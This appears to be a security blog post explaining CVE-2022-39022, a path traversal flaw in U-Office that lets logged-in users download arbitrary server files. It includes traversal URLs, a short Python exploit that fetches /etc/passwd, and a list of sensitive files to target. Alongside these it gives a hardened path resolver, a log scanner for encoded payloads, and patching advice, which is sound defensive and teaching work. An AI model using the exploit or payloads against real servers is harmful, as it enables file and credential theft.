In late 2022, a security flaw shook up businesses using U-Office, a popular office automation platform. Tracked as CVE-2022-39022, the vulnerability lets any authenticated user, even one with only basic login rights, download arbitrary files from the underlying server just by tweaking a URL. In plain terms: if your U-Office is vulnerable, anyone with an account can walk off with files from your server's filesystem. This post breaks down what happened, why it matters, how the bug works, and what you should do right away.
What is the Problem?
Let's keep it simple: U-Office has a force download feature that lets users download documents from the web interface. The server failed to check which file was actually being requested, so a user could ask for files that should never be served, such as C:\Windows\win.ini on Windows or /etc/passwd on Linux. This is a classic path traversal (also called directory traversal) vulnerability.
Let's look at a "safe" U-Office download URL (the endpoint and parameter names here are illustrative, not the product's real ones):
https://your.company.com/fileDownload?file=reports/quarter4.docx
But what if an attacker tweaks it to this?
https://your.company.com/fileDownload?file=../../../../../../etc/passwd
Or, on Windows:
https://your.company.com/fileDownload?file=../../../../../../windows/win.ini
Each "../" step climbs one directory above the intended folder. A vulnerable U-Office reads whatever path it is handed and never checks that the result still lies inside its own download directory.
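To make the failure concrete, here is an added example, written for this post and not code from U-Office or its vendor, that puts the trusting path join a vulnerable download handler effectively performs beside a hardened resolver. The download root, the file names and the symlink are constructed for the demo. The hardened version also covers two cases the URLs above do not show: an absolute path, which os.path.join would silently accept in place of the base directory, and a symlink inside the root that points outside it.

```python
import os
import posixpath
import tempfile

# Added example, not code from U-Office or its vendor. It contrasts the
# trusting join a vulnerable download handler effectively performs with a
# hardened resolver. Directory and file names below are constructed.


class TraversalError(ValueError):
    """Raised when a requested path would escape the download root."""


def vulnerable_resolve(base_dir, requested):
    """What the vulnerable handler effectively does: trust the client path.

    Uses posixpath so the result is the same on every platform.
    """
    return posixpath.normpath(posixpath.join(base_dir, requested))


def safe_resolve(base_dir, requested):
    """Return an absolute path guaranteed to sit under base_dir.

    Raises TraversalError for anything that would escape the root and
    FileNotFoundError if the target is not an existing regular file.
    """
    base = os.path.realpath(base_dir)
    # os.path.join throws base_dir away if `requested` is absolute
    # ("/etc/passwd" or "C:\\..."), so strip leading separators first.
    rel = requested.lstrip("/\\")
    # realpath collapses ".." and follows symlinks, so the containment
    # check below sees the real target, not the string the client sent.
    candidate = os.path.realpath(os.path.join(base, rel))
    if os.path.commonpath([base, candidate]) != base:
        raise TraversalError(requested)
    if not os.path.isfile(candidate):
        raise FileNotFoundError(requested)
    return candidate


def classify(base_dir, requested):
    """Map one request to 'ok' / 'blocked' / 'missing' for the demo."""
    try:
        safe_resolve(base_dir, requested)
        return "ok"
    except TraversalError:
        return "blocked"
    except FileNotFoundError:
        return "missing"


def demo():
    """Build a throwaway download root and run requests through safe_resolve."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        outside = os.path.join(root, "outside-secret.txt")  # constructed
        with open(outside, "w") as fh:
            fh.write("not for download\n")
        base = os.path.join(root, "files")
        os.makedirs(os.path.join(base, "reports"))
        with open(os.path.join(base, "reports", "quarter4.docx"), "w") as fh:
            fh.write("Q4 report\n")
        try:
            # A symlink inside the root that points outside it; blocked
            # because realpath follows it before the containment check.
            os.symlink(outside, os.path.join(base, "reports", "link.txt"))
            have_symlink = True
        except OSError:  # e.g. Windows without symlink privilege
            have_symlink = False

        requests = [
            "reports/quarter4.docx",            # legitimate
            "../../../../../../etc/passwd",     # the classic climb
            "reports/../../outside-secret.txt", # climb hidden behind a real dir
            "/etc/passwd",                      # absolute path, join would accept
            "reports/missing.docx",             # inside root but absent
        ]
        if have_symlink:
            requests.append("reports/link.txt")
        for req in requests:
            results[req] = classify(base, req)
    return results


if __name__ == "__main__":
    # The trusting join lands on /etc/passwd no matter how deep the root is.
    print(vulnerable_resolve("/srv/uoffice/files", "../../../../../../etc/passwd"))
    for req, verdict in demo().items():
        print(f"{verdict:8} {req}")
```

Note that the absolute-path case is reported as "missing" rather than "blocked": after the leading slash is stripped it is looked up as files/etc/passwd inside the root, which is exactly what you want. Checking the resolved path with commonpath instead of a startswith on the string also avoids the classic mistake where /srv/uoffice/files-old passes a prefix test for /srv/uoffice/files.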
Here's how a simple exploit might look in Python:
```python
#!/usr/bin/env python3
import requests

# Replace with the actual target host and a valid (low-privilege) login
target = 'https://your.company.com'
login_url = f'{target}/login'
# Endpoint and parameter names are illustrative; adjust to the real download URL
download_url = f'{target}/fileDownload?file=../../../../../../etc/passwd'

# Session object keeps the authentication cookie across requests
sess = requests.Session()

# Log in to obtain a session cookie (edit field names to match the login form)
payload = {'username': 'user', 'password': 'password'}
sess.post(login_url, data=payload, timeout=10)

# Exploit: ask the download endpoint for /etc/passwd
r = sess.get(download_url, timeout=10)
if r.status_code == 200 and 'root:' in r.text:
    print('[+] Exploit success! /etc/passwd:\n')
    print(r.text)
else:
    print(f'[-] Exploit failed (HTTP {r.status_code}).')
```
Important: the script needs valid login credentials, but an ordinary user account is enough; no admin rights are required.
Imagine an account with minimal U-Office rights. Using the trick above, the attacker could grab:
- /etc/passwd (the local user list)
- /etc/shadow (password hashes, but only if the web application's service account can read it, which on a sensibly configured server it cannot)
- On Windows, C:\Windows\win.ini, or any document the service account can read, for example C:\Users\Administrator\Desktop\secret.txt
Once any of these are in hand, an attacker can get more aggressive: reusing recovered credentials to log in elsewhere, reading application configuration files for database passwords or API keys, or using what they learn to find the next weakness and escalate access.
Further exploits: if the U-Office server is reachable from the rest of your network, it becomes a stepping-stone and your wider infrastructure is at risk.
This isn't just theory: several companies reported incidents related to this bug. See the NSFOCUS advisory and CVE Details for more information.
Official References
- CVE-2022-39022 at cve.org
- NSFOCUS Security Advisory (Chinese)
- GitHub PoC Example
What Should You Do?
1. Patch immediately: check for the latest U-Office updates or patches from the vendor.
2. Web Application Firewall (WAF): block requests containing "../" patterns as a stop-gap. Attackers will try encoded variants (..%2f, %2e%2e/, ..\ and double-encoded forms), so match on the decoded path and query values, and treat the WAF rule as a mitigation rather than a fix.
3. Least privilege: run the U-Office service under an account that can read only the files it needs, so that a traversal bug cannot reach /etc/shadow, private keys or other sensitive files.
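As an added example (not code from U-Office, its vendor or any WAF product), the following script runs two rules over constructed access-log lines: the literal "../" match a simple WAF rule would use, and a check on the percent-decoded path and query values. The log lines, hosts, usernames and the /fileDownload endpoint are invented for the demo; the point is which of the encoded requests the literal rule misses.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Added example, not code from U-Office, its vendor or any WAF. It scans
# constructed access-log lines for traversal attempts two ways: the literal
# "../" match a naive rule uses, and a check on the percent-decoded value.

# Constructed sample log (Common Log Format); hosts, users and URLs are invented.
SAMPLE_LOG = [
    '10.0.0.5 - alice [31/Oct/2022:07:15:01 +0000] "GET /fileDownload?file=reports/quarter4.docx HTTP/1.1" 200 18342',
    '10.0.0.9 - bob [31/Oct/2022:07:16:12 +0000] "GET /fileDownload?file=../../../../../../etc/passwd HTTP/1.1" 200 2154',
    '10.0.0.9 - bob [31/Oct/2022:07:16:20 +0000] "GET /fileDownload?file=..%2f..%2f..%2fwindows%2fwin.ini HTTP/1.1" 200 92',
    '10.0.0.9 - bob [31/Oct/2022:07:16:27 +0000] "GET /fileDownload?file=..%5c..%5cwindows%5cwin.ini HTTP/1.1" 200 92',
    '10.0.0.9 - bob [31/Oct/2022:07:16:31 +0000] "GET /fileDownload?file=%252e%252e%252f%252e%252e%252fetc%252fshadow HTTP/1.1" 403 0',
    '10.0.0.5 - alice [31/Oct/2022:07:17:02 +0000] "GET /fileDownload?file=reports/v2..final.docx HTTP/1.1" 200 9001',
]

# What a "block ../" WAF rule sees: the raw request line, literal match only.
NAIVE_RULE = re.compile(r"\.\./")

# A ".." path segment bounded by a slash, a backslash, or the string ends.
DOTDOT_SEGMENT = re.compile(r"(^|[/\\])\.\.([/\\]|$)")

# Pull method, request target and status out of a CLF line.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def fully_decode(value, rounds=3):
    """Strip up to `rounds` layers of percent-encoding, stopping when stable."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(target):
    """True if the path or any query value holds a '..' segment once decoded."""
    parts = urlsplit(target)
    # parse_qsl already decodes one layer; fully_decode handles double encoding.
    values = [parts.path] + [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    return any(DOTDOT_SEGMENT.search(fully_decode(v)) is not None for v in values)


def scan(lines):
    """Return one (target, naive_hit, decoded_hit, status) tuple per request."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        findings.append((target, bool(NAIVE_RULE.search(target)),
                         is_traversal(target), m.group("status")))
    return findings


def missed_by_naive_rule(lines):
    """Targets the decoded check flags that the literal '../' rule does not."""
    return [t for t, naive, decoded, _ in scan(lines) if decoded and not naive]


if __name__ == "__main__":
    for target, naive, decoded, status in scan(SAMPLE_LOG):
        print(f"naive={naive!s:5} decoded={decoded!s:5} status={status} {target}")
    print("missed by literal '../' rule:", missed_by_naive_rule(SAMPLE_LOG))
```

The last sample line (reports/v2..final.docx) is there to show that matching on ".." alone is not enough either: the decoded check only fires on a whole ".." segment, so dots inside a filename do not produce a false positive. Run against real logs, the "status" column tells you which traversal attempts were actually served (200) rather than refused.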
Conclusion
CVE-2022-39022 is a dangerous but simple vulnerability. It shows just how crucial it is for web applications to validate user input—especially when handling file paths. Don’t wait to update: hackers rarely sleep, and “low privilege” doesn’t mean low impact.
Stay safe!
Timeline
Published on: 10/31/2022 07:15:00 UTC